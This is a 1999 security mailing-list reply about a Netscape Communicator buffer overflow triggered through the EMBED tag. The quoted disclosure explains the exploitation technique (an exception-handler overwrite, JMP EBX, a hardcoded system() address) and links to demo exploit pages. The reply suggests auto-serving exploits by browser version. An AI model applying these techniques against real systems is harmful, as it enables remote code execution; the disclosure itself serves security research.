Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow

[kerb () FNUSA COM (Kerb)]

I tried the URL for the notepad.exe on a Windows 95 (4.00.950a) machine,
Pentium II 266 w/ 56 MB of RAM,
using Netscape Communicator 4.05 Preview Release 1 (AWT 1.1.5) even though
these are coded for Win98.  When I went
there with NC 4.05, it gave me a blue screen of death that was completely
unrecoverable.  I had to reboot the system.
So, basically, it is a DoS for Netscape users, could possibly be coded into a
CGI or Javascript that checks browser
version and writes the corresponding exploit code.   Just a thought.

-Kerb

On Thursday, September 02, 1999 9:46 AM, DEF CON ZERO WINDOW
[SMTP:defcon0 () UGTOP COM] wrote:
: Hi,
:
:  I discovered a buffer overflow bug which causes huge security hole on the
:  `Netscape communicator 4.06J, 4.5J - 4.6J, 4.61e( probably, a version 3.0
:  after all )'.
:
:  The problem of this application is in the handling of EMBED TAG, the buffer
:  overflow is caused if the long string is specified at "pluginspage" option.
:  I coded the exploit program to execute any command on the victim machine. I
:  tested on the Windows98.
:
:  However, this program specifies immediately the address of the system()
:  function which is defined on the msvcrt.dll, this program does not work on
:  the Windows machine which is installed the other version of msvcrt.dll (This
:  program is for Version 6.00.8397).
:
:  The reason that I specified the immediate address of the function is the
:  buffer which can be written the exploit code is very short, the size of
:  writable buffer is about 83 bytes. The buffer is too small to put the code
:  which gets the address of the functions which are defined on the
:  "msvcrt.dll".
:
:  However, this problem will be solved if the code that searchs the attack
code
:  and executes that code is put on the exploit code. The attack code also can
:  be written on the other buffer.
:
: # An attack code could be written in 2300 bytes to stack_bottom.
:
:  The trojan or virus can be written on the attack code, this problem is very
:  serious.
:
:  In this case, the stack pointer (ESP) when the overflow is caused differs by
:  the environment. So, the method of the RET address overwrites can not be
used
:  to exploit. This example overwrites the handling address of the access
:  violation, the exploit code is called when the access violation is caused.
:  When the access violation is caused, the address of the exploit buffer is
:  stored in the EBX register. So, I overwrite the handling address to the code
:  that the "JMP EBX" instruction is written.
:
:  You can quickly test this exploit on my site. I have prepared some versions
:  of exploits that execute "welcome.exe" on your Windows98 machine. If you are
:  user of the specified version of netscape, please test. I did not code the
:  exploit program for the WindowsNT and Windows95, but they also contain same
:  problem.
:
: .. and, This problem can't be avoided.
:
:
: [ exploit demo page ]
:
: exec "welcome.exe" - nc4x_ex.c
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi
:
: exec "notepad.exe"
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
:
: ---
:
: [ exploit test ]
:
: blue screen(int 01h)
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
:
:
: [ document(japanese) ]
: http://www.ugtop.com/defcon0/hc/nc4x_ex_demo.htm
:
:
: special thanks:
: UNYUN( The Shadow Penguin Security )
: http://shadowpenguin.backsection.net/
:
:
:
: --
: : R00t Zer0 -   http://www.ugtop.com/defcon0/index.htm           :
: : E-Mail: defcon0 () ugtop com                                      :
: : --                                                          -- :
: : "HP/UX is the worst OS for the hacker..." - Mark Abene         :